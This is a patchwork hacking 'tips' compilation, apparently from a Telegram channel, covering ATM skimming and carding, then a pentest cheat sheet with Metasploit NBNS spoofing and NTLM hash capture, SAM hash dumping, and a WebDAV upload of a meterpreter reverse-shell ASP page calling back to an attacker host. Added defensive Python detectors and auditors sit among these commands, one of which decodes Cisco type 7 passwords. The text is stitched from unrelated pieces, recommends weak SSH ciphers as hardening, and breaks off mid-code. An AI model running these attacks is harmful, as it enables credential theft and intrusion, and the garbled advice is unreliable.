TOP 7 WAYS - ILLEGAL HACKING $ - BY BAD HACKERS:
First way
Scammers often use devices that, once fitted to an ATM, let them capture information about the card. One such device is an overlay fitted over the keypad that outwardly reproduces the original buttons. The cardholder withdraws money from the account without any problem, but the fake keypad records every key pressed, including, of course, the PIN. Tip: look carefully at the keypad of an unfamiliar ATM before withdrawing money from your account.
Second way
Another device is what the English also call a Lebanese loop. This is a plastic sleeve slightly larger than the card, which is placed in the ATM's card slot. The cardholder tries to withdraw money, but the ATM cannot read the data from the magnetic strip and, because of the sleeve's design, cannot return the card either. At that moment the attacker walks up and says that the very same thing happened to him only a day ago: to get the card back, you just need to enter the PIN and press Cancel twice. The cardholder tries this and, of course, nothing happens. He concludes that the card has been retained by the ATM and leaves to contact the bank. The fraudster then calmly removes the card together with the sleeve using some simple tool, and he already knows the PIN, since the card's (now former) owner entered it himself in the swindler's presence. All that remains is to withdraw money from the account.
Third way
It is technically difficult, but it is possible to intercept the data that the ATM sends to the bank to verify that the requested amount is available in the account. To do this, fraudsters need to connect to the appropriate cable and read the data. Given that the relevant instructions are easy to find in the public domain on the Internet and that technology does not stand still, it can be argued that this method will be encountered more and more often.
The fourth way
To learn the PIN, some scammers leave a miniature video camera nearby while they sit in a car parked close by with a laptop on whose screen the digits entered by the cardholder are visible. When entering a PIN, cover the keypad with your free hand.
Fifth way
Expensive, but one hundred percent reliable. There have been cases where fraudsters set up their own "ATM" in a crowded place. Admittedly, for some reason it does not work and naturally does not dispense any money, but it successfully reads all the necessary data from the card. And then it turns out that you already withdrew all the money from your account yesterday and for some reason do not want to remember it!
Sixth way
At one time, fraudsters in the UAE installed special devices in the card slots that recorded all the data of any card inserted into the ATM. The criminals then only had to obtain the PIN, either by the first or the fourth method described above, or simply by peeking over the shoulder. Well, the local took a liking to your ring, or your watch, or something else ...
Method Seven
> You can't fight this one; you can only put up with it. Nothing here depends on your attentiveness, caution or prudence. It happens that the people who conspire with scammers are those who have very simple access to your cards: bank employees, for example. This happens very rarely, but no one is safe from such cases.
> But it is not only cardholders who suffer. Large firms, shops and banks suffer too, and there the losses are counted in the hundreds of thousands of dollars, sometimes in millions.
> Law-enforcement specialists in many countries believe that crimes committed using plastic means of payment rank among the most dangerous economic crimes. Moreover, they are committed not only within computerized banking systems but also over the Internet.
> According to some reports, there are today about 30 types of illegal card transactions over the World Wide Web. The most common are payment with non-existent cards, the creation of fake online stores, electronic theft, and fake payments in gambling establishments.
> A special term has even appeared: carding. It is the illegal use of bank cards to purchase goods or services over the Internet. In carding, one can either obtain the details of a real card or generate all of this data in such a way that every system accepts the fake as real. Anyone interested can freely find links to sites that openly sell stolen credit cards. The standard price for a card is from 40 cents to 5 dollars. Most of the sellers are in the former USSR, the buyers, by contrast, are concentrated in the Far East, and the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have already earned a reputation as the countries where the most skilled hackers live.
> Virtual bazaars are arranged almost like real exchanges, with prices fluctuating with demand. They are hosted on hacked pages and are therefore short-lived: most of these pages survive only a couple of days. Experts agree that the center of global carding is St. Petersburg, where credit cards leave the counter in batches of 500-5000 at a price of $1 apiece.
> Credit cards are obtained by breaking into large financial firms. For example, in 2003, after refusing to pay hackers money for their silence, the well-known financial firm CD Universe admitted to losing a database of 300,000 cards. England alone lost 411 million pounds to carding in 2003. In 2005, this figure rose to a billion. Consequently, 25 million pounds were allocated to combat cybercrime.
enjoy
USE FOR LEARN !!!!!!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTLM Capture
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set JOHNPWFILE /tmp/john_http
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > run
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
Solution
The solution is to stop NetBIOS from broadcasting. The setting for this is in what I hope is a very familiar place that you might not have paid much attention to before.
> Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling NetBIOS completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest, so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trust, called a forest trust, that lets users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is still used in the trust creation process, even though Microsoft has officially "deprecated" NetBIOS in versions of Windows from 2000 on. So if you disable NetBIOS on your domain controllers, you won't be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable NetBIOS on your servers but would be affected by the side effect on forest trusts, then ideally you should upgrade and keep up with the times anyway. Alternatively, you can get away with, at the very least, disabling NetBIOS on your workstations.
See below for step by step instructions on disabling Netbios on workstations:
Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties.
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), click Advanced, and then click the WINS tab. Note: in Windows XP and Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
For Windows 7, 8 and 10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
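The poisoning shown at the top of this section works because any host may answer a broadcast name query, so the defender-side counterpart to switching NetBIOS off is to watch UDP/137 for answers that should not exist. The following Python is an added example, not code from the page or from the channel: it parses NBNS datagrams and flags three things, an answer to a canary name that no real host owns, an answer that matches no outstanding query, and one source answering many different names. The packet builders, the sample traffic and the names in it (FILESRV01, WPAD, NB-CANARY-X, PRINTER and the responder 10.10.10.10) are constructed for the example; in practice you feed it (src_ip, payload) pairs taken from a capture.

```python
import struct
from collections import defaultdict

# NBNS (UDP/137) first-level name encoding: 16 raw bytes (15-char name padded
# with spaces plus a suffix byte) become 32 letters A-P, one per nibble,
# prefixed by the length byte 0x20 and terminated by 0x00.
def encode_nbns_name(name, suffix=0x20):
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc.append((b >> 4) + 0x41)
        enc.append((b & 0x0F) + 0x41)
    return bytes([32]) + bytes(enc) + b"\x00"

def decode_nbns_name(data, offset):
    """Decode one encoded name; return (name, suffix, offset after the terminator)."""
    length = data[offset]
    enc = data[offset + 1:offset + 1 + length]
    raw = bytes((((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41)) for i in range(0, length, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15], offset + 1 + length + 1

def parse_nbns(data):
    """Parse an NBNS datagram into transaction id, response flag, names and answered IPs."""
    tid, flags, qdcount, ancount, _, _ = struct.unpack("!6H", data[:12])
    off, names, ips = 12, [], []
    for _ in range(qdcount):
        name, _, off = decode_nbns_name(data, off)
        off += 4                      # QTYPE + QCLASS
        names.append(name)
    for _ in range(ancount):
        name, _, off = decode_nbns_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        names.append(name)
        if rtype == 0x0020:           # NB record: repeated (NB_FLAGS, IPv4) pairs
            for i in range(0, rdlen, 6):
                ips.append(".".join(str(b) for b in rdata[i + 2:i + 6]))
    return {"tid": tid, "response": bool(flags & 0x8000), "names": names, "ips": ips}

# Constructed packet builders so the example runs without a capture file.
def build_query(tid, name):
    return struct.pack("!6H", tid, 0x0110, 1, 0, 0, 0) + encode_nbns_name(name) + struct.pack("!HH", 0x20, 1)

def build_response(tid, name, ip):
    rdata = struct.pack("!H", 0) + bytes(int(x) for x in ip.split("."))
    return (struct.pack("!6H", tid, 0x8500, 0, 1, 0, 0) + encode_nbns_name(name)
            + struct.pack("!HHIH", 0x20, 1, 300000, len(rdata)) + rdata)

def detect_nbns_spoofing(datagrams, canary_names=(), max_names_per_responder=2):
    """Return alert strings for a list of (src_ip, payload) datagrams in capture order."""
    outstanding, answered, alerts = set(), defaultdict(set), []
    canaries = {c.upper() for c in canary_names}
    for src, payload in datagrams:
        pkt = parse_nbns(payload)
        if not pkt["response"]:
            outstanding.update((pkt["tid"], n) for n in pkt["names"])
            continue
        for name in pkt["names"]:
            if name in canaries:          # nobody owns the canary, so any answer is a poisoner
                alerts.append(f"{src} answered canary name {name} with {pkt['ips']}")
            if (pkt["tid"], name) in outstanding:
                outstanding.discard((pkt["tid"], name))
            else:                          # answer without a matching query
                alerts.append(f"{src} sent unsolicited response for {name} (tid {pkt['tid']:#06x})")
            answered[src].add(name)
    for src, names in answered.items():   # one host claiming many names is the poisoner pattern
        if len(names) > max_names_per_responder:
            alerts.append(f"{src} answered {len(names)} distinct names: {sorted(names)}")
    return alerts

# Constructed sample traffic: a client at 10.10.10.5 queries, 10.10.10.10 answers everything.
SAMPLE_TRAFFIC = [
    ("10.10.10.5", build_query(0x1234, "FILESRV01")),
    ("10.10.10.10", build_response(0x1234, "FILESRV01", "10.10.10.10")),
    ("10.10.10.5", build_query(0x1235, "WPAD")),
    ("10.10.10.10", build_response(0x1235, "WPAD", "10.10.10.10")),
    ("10.10.10.5", build_query(0x1236, "NB-CANARY-X")),
    ("10.10.10.10", build_response(0x1236, "NB-CANARY-X", "10.10.10.10")),
    ("10.10.10.10", build_response(0x9999, "PRINTER", "10.10.10.10")),
]

if __name__ == "__main__":
    for alert in detect_nbns_spoofing(SAMPLE_TRAFFIC, canary_names=["NB-CANARY-X"]):
        print("ALERT:", alert)
```

A detector like this is useful on segments where NetBIOS cannot yet be switched off (the forest-trust caveat above): a poisoner has to answer the canary name to be effective at all, and that answer is exactly what makes it visible.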
enjoy
topic git sources
[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
> Restart SSH
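A caveat on the two lines above: arcfour is RC4, and OpenSSH 7.6 removed the arcfour ciphers and the hmac-ripemd160 MAC from the server entirely, so that list still permits weak algorithms on older servers and makes sshd refuse to start on newer ones. The following Python is an added example, not the page's or OpenSSH's code: it audits an sshd_config text for weak and legacy Ciphers/MACs entries, honouring sshd's rule that the first occurrence of a keyword wins and the +/-/^ list prefixes. The weak-algorithm sets are this example's assumptions; the first sample is the page's own two lines and the second is a constructed hardened replacement.

```python
import re

# Assumed classification for this example (based on OpenSSH release notes):
# RC4 and CBC ciphers are weak; hmac-ripemd160 and the MD5/truncated MACs are
# weak; hmac-sha1 still works but is no longer recommended.
WEAK_CIPHERS = {"arcfour", "arcfour128", "arcfour256", "3des-cbc", "blowfish-cbc", "cast128-cbc"}
WEAK_MACS = {"hmac-md5", "hmac-md5-96", "hmac-sha1-96", "hmac-ripemd160", "hmac-ripemd160@openssh.com"}
LEGACY_MACS = {"hmac-sha1"}

def parse_sshd_config(text):
    """Return {keyword: value} for Ciphers and MACs; sshd keeps the FIRST occurrence."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key in ("ciphers", "macs") and key not in settings:
            settings[key] = value
    return settings

def audit_sshd_config(text):
    """Return (keyword, algorithm, rating) tuples; an empty list means nothing weak was listed."""
    settings = parse_sshd_config(text)
    findings = []
    for key, weak, legacy in (("ciphers", WEAK_CIPHERS, set()), ("macs", WEAK_MACS, LEGACY_MACS)):
        value = settings.get(key)
        if value is None:
            continue          # keyword absent: the build's defaults apply; inspect with `sshd -T`
        if value.startswith("-"):
            continue          # "-alg,..." removes algorithms from the defaults, nothing is enabled
        for algo in value.lstrip("+^").split(","):   # "+" appends, "^" prepends to the defaults
            algo = algo.strip()
            if algo in weak or algo.endswith("-cbc"):
                findings.append((key, algo, "weak"))
            elif algo in legacy:
                findings.append((key, algo, "legacy"))
    return findings

# Sample 1: the two lines given on this page.
PAGE_CONFIG = """\
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
"""

# Sample 2: a constructed replacement using only AEAD/CTR ciphers and ETM SHA-2 MACs.
HARDENED_CONFIG = """\
# hardened example
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
"""

if __name__ == "__main__":
    for label, cfg in (("page", PAGE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_sshd_config(cfg) or "no weak or legacy algorithms")
```

After editing the file, `sshd -t` checks the syntax and `sshd -T` prints the effective configuration, which is the text worth auditing when the keyword is inherited from defaults or an Include.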
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add a double quote (") on either side of the executable path in the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
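Checking permissions with icacls is the second half of the assessment; the first half, finding services whose ImagePath is unquoted and contains a space, can be automated. The following Python is an added example, not the page's own code: analyze_image_path derives the executable path from a raw ImagePath value and lists the paths Windows would try before the real one (each space-delimited prefix plus .exe, which is how CreateProcess resolves an unquoted path), so you know which directories to run icacls against. The sample ImagePath values are constructed, with the page's "Vuln Software 7.0" path among them; the optional winreg loader is the only part that needs Windows.

```python
import re
import sys

def analyze_image_path(image_path):
    """Classify one ImagePath value and list the hijack candidates Windows would try first."""
    s = image_path.strip()
    if not s:
        return {"vulnerable": False, "exe": "", "candidates": []}
    if s.startswith('"'):                       # quoted: the path is unambiguous
        end = s.find('"', 1)
        return {"vulnerable": False, "exe": s[1:end] if end != -1 else s[1:], "candidates": []}
    m = re.search(r"\.exe\b", s, re.IGNORECASE)  # executable ends at the first .exe
    if m:
        exe = s[:m.end()]
    else:                                       # no .exe (drivers etc.): strip obvious argument tails
        exe = s.split(" /")[0].split(" -")[0]
    # CreateProcess tries each space-delimited prefix with ".exe" appended before the full path.
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    return {"vulnerable": bool(candidates), "exe": exe, "candidates": candidates}

def find_unquoted_service_paths(services):
    """services: {service_name: ImagePath}; returns {service_name: [candidate paths]} for the exposed ones."""
    report = {}
    for name, image_path in services.items():
        result = analyze_image_path(image_path)
        if result["vulnerable"]:
            report[name] = result["candidates"]
    return report

def load_service_image_paths():
    """Windows only: read ImagePath for every key under HKLM\\SYSTEM\\CurrentControlSet\\Services."""
    import winreg
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            try:
                with winreg.OpenKey(root, name) as svc:
                    value, _ = winreg.QueryValueEx(svc, "ImagePath")
            except OSError:
                continue                        # no ImagePath value on this key
            if isinstance(value, str):
                result[name] = winreg.ExpandEnvironmentStrings(value)
    return result

# Constructed sample registry data (service name -> ImagePath).
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe",
    "GoodSvc": r'"C:\Program Files\Good\svc.exe" -arg',
    "SvcHost": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "AgentSvc": r"C:\Program Files\Some Vendor\agent.exe /service",
    "FooDrv": r"\SystemRoot\System32\drivers\foo.sys",
}

if __name__ == "__main__":
    services = load_service_image_paths() if sys.platform == "win32" else SAMPLE_SERVICES
    for name, candidates in find_unquoted_service_paths(services).items():
        print(name)
        for c in candidates:
            print("  would be tried first:", c)
```

Each candidate's parent directory (C:\, C:\Program Files (x86)\Vuln\ and so on) is what the icacls check above should be run against: the path is only exploitable where a low-privileged user can create a file there.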
topic git sources
Pyinstaller linux
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+ Look for your .exe or your .app bundle in the dist directory.
#FastTips
Pentesting tips:
Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop
+ Disable network-manager
service network-manager stop
+ Set IP address
ifconfig eth0 192.168.50.12/24
+ Set default gateway
route add default gw 192.168.50.9
+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
+ Show routing table
Windows - route print
Linux - route -n
+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.168.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'
topic git sources
Internet Host/Network Enumeration
[+] WHOIS Querying
whois www.domain.com
[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com
[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx
[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any
[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup, then at its interactive prompt: ls -d domain.com.local
[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>
topic git sources
IP Network scanning
[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0
[+] NMAP Scans
[+] Nmap ping scan
sudo nmap -sn -oA nmap_pingscan 192.168.100.0/24 (-PE)
[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24
[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24
[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Source port scanning
nmap -g <port> (e.g. 88 (Kerberos), 53 (DNS) or 67 (DHCP))
Note: setting the source port does not work with OS detection.
[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes
[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]
# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]
# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file
# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file
# Receive file
ncat [<host>] [<port>] > file
# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]
# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]
# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>
# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]
# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]
topic git sources
Cisco/Networking Commands
? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode
enable secret is more secure than enable password.
For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted using the weak, reversible type 7 algorithm.
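To see what "weak, reversible" means in practice, here is an added Python example, not from the page or from Cisco: it scans a running-config for password and secret lines, classifies each by its type number, and for type 7 entries applies the publicly documented XOR decoding (the two leading digits select an offset into a fixed key) so an auditor can demonstrate that the value is not a hash and the password must be treated as exposed and rotated. The sample config is the page's two lines plus one constructed plaintext entry.

```python
import re

# Fixed key used by Cisco's type 7 obfuscation (publicly documented, not a secret).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

def decode_type7(encoded):
    """Reverse a type 7 string: two decimal digits give the key offset, then each
    hex byte is XORed with the next key byte. Included to show it is not a hash."""
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]) for i, b in enumerate(body))

HASH_TYPES = {
    "0": "plaintext",
    "4": "unsalted SHA-256 (type 4, deprecated)",
    "5": "salted MD5 (type 5)",
    "7": "reversible type 7 obfuscation",
    "8": "PBKDF2-SHA256 (type 8)",
    "9": "scrypt (type 9)",
}
USER_RE = re.compile(r"^\s*username\s+(\S+)")
# "password|secret", optional one-digit type, then the stored value at end of line.
CRED_RE = re.compile(r"\b(password|secret)\s+(?:(\d)\s+)?(\S+)\s*$")

def audit_cisco_config(text):
    """Return one finding per credential line: principal, scheme, advice, and the
    recovered value when the scheme is reversible."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CRED_RE.search(line)
        if not m:
            continue
        keyword, ptype, value = m.group(1), m.group(2) or "0", m.group(3)
        user = USER_RE.match(line)
        entry = {
            "line": lineno,
            "principal": user.group(1) if user else "enable",
            "keyword": keyword,
            "type": ptype,
            "scheme": HASH_TYPES.get(ptype, "unknown"),
            "recovered": None,
        }
        if ptype == "7":
            entry["recovered"] = decode_type7(value)
            entry["advice"] = "treat as exposed; rotate and re-enter with 'secret' (type 8/9 where supported)"
        elif ptype == "0":
            entry["advice"] = "plaintext in config; re-enter with 'secret'"
        elif ptype in ("4", "5"):
            entry["advice"] = "hashed, but upgrade to type 8 or 9 where the IOS version supports it"
        else:
            entry["advice"] = "ok"
        findings.append(entry)
    return findings

# The page's two example lines plus one constructed plaintext entry.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
username backup password letmein
"""

if __name__ == "__main__":
    for f in audit_cisco_config(SAMPLE_CONFIG):
        print(f"line {f['line']}: {f['principal']} {f['keyword']} type {f['type']} "
              f"({f['scheme']}) -> {f['advice']}")
```

Note that `service password-encryption` only turns plaintext entries into type 7, so it is not a substitute for `secret`; the audit treats both the same way.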
enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify
#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords
topic git sources
Remote Information Services
+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliaries:
auxiliary/gather/enum_dns
use auxiliary/gather/dns...
[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/finger_users
+ NTP
Metasploit Auxiliaries
+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
[+] RPC Services
rpcinfo -p
Endpointmapper metasploit
Web Services
+ WebDAV
Metasploit auxiliary modules
Upload shell to vulnerable WebDAV directory:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt
[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]
# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1],[port number 2],[port number 3]
# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [output file]
# To use a proxy while scanning a host
perl nikto.pl -host [host IP/name] -useproxy [proxy address]
WHY WE SHOULD USE TCP CONNECTIONS?
> What is 1 TCP connection
Before examining the structure of the TCP packet header, let's figure out what one TCP connection is. This will help to understand more clearly what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved when opening one page of a website? A typical website page consists of one HTML document, several cascading style sheets (CSS) and JavaScript files, as well as a couple of dozen image files. To receive each of these files, a new TCP connection is created, and for each of these connections a three-way handshake is performed. This goes to the question of what "overhead" TCP carries.
> That is, when you open the website page, the browser makes the first TCP connection and receives the source code of the web page. In this code, the browser finds links to style, script and image files, and a new TCP connection is started for each of these files.
> Therefore, when analyzing traffic in Wireshark, even when you open a single web page you will see many started and completed TCP connections.
1) Source port - bits 0-15. This is the packet's source port. Originally the source port was tied directly to the process in the sending system. Today, a hash of the IP addresses and the source and destination ports is used to achieve this uniqueness, which we can associate with a single application or program.
2) Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially tied directly to the process in the receiving system. Today a hash is used instead, which allows more connections to be open at the same time. When the packet is received, the destination and source ports are swapped in the response back to the original sending host, so that the destination port becomes the source port and the source port becomes the destination port.
3) The source port and destination port do not have to be the same: for example, a request to port 80 on the server may come from port 34054 on the client.
4) Port numbers on the server can be either standard (well-known) or arbitrary.
5) Sequence number - bits 32-63. The sequence number field numbers each TCP packet so that the TCP stream can be reassembled in the correct order. The sequence number is then returned in the ACK field to confirm that the packet was received correctly.
It counts the bytes transmitted: each byte of payload transferred increases this value by 1.
6) If the SYN flag is set (a session is being established), the field contains the Initial Sequence Number (ISN). For security reasons this value is generated randomly and lies between 0 and 2^32 - 1 (4294967295). The first byte of payload in the established session will have number ISN + 1.
7) Otherwise, if SYN is not set, this is the sequence number of the first byte of data carried in this packet.
8) Acknowledgment number (ACK SN) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with a given sequence number, and if everything is in order with the packet, we respond with an ACK packet whose acknowledgment number corresponds to the original sequence number.
If the ACK flag is set, this field contains the number of the octet that the sender of this segment expects to receive next. This means that all previous octets (numbered ISN + 1 to ACK - 1 inclusive) were received successfully.
9) Each side keeps its own Sequence number for the data it sends and separately an Acknowledgment number for the data it receives. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.
10) Header length (data offset) - bits 96-99. This field gives the length of the TCP packet header and thus where the actual data (payload) begins. The field is 4 bits wide and gives the TCP header length in 32-bit words. The header always ends on a 32-bit boundary, even with options set (options may be absent entirely, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
11) The minimum header size is 5 words and the maximum is 15 words, giving a minimum of 20 bytes and a maximum of 60 bytes, which allows up to 40 bytes of options in the header. The field is called data offset because it also gives the position of the actual data from the beginning of the TCP segment.
12) So the header length determines the offset of the payload relative to the beginning of the segment. For example, a data offset of 1111 indicates that the header occupies fifteen 32-bit words (15 words * 32 bits / 8 bits = 60 bytes).
TCP Session
TCP handshake (establishing a TCP connection)
> TCP uses a three-way handshake to establish a connection.
1) A connection can be made only if the other side is listening on the port to which the connection will be made: for example, a web server listens on ports 80 and 443. This is not covered by the handshake itself, but before the client tries to connect to the server, the server must first bind to the port and start listening on it to open it for connections: this is called a passive open. Once the passive open is in place, the client can initiate an active open. To establish the connection, a three-way (three-stage) handshake takes place:
2) First stage, sending a packet with the SYN flag set: the active open is performed by the client sending SYN to the server. The client sets the sequence number of the segment to a random value A.
Note that by default Wireshark shows the relative value of the sequence number (Sequence number); just below it you can also see the real value (shown as raw).
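To tie the header field layout above to the handshake, here is an added Python example (written here, not code from the original post) that parses a segment at the bit offsets given, builds a constructed SYN / SYN-ACK / ACK / first-data exchange between client port 34054 and server port 80, and recomputes the relative sequence numbers Wireshark displays; the ISNs A and B and the MSS option are constructed values.

```python
import struct
SYN, ACK = 0x02, 0x10   # flag bits in the low 9 bits of the offset/flags word

def parse_tcp_header(segment):
    """Parse a TCP segment at the bit offsets described above and return its fields."""
    if len(segment) < 20:
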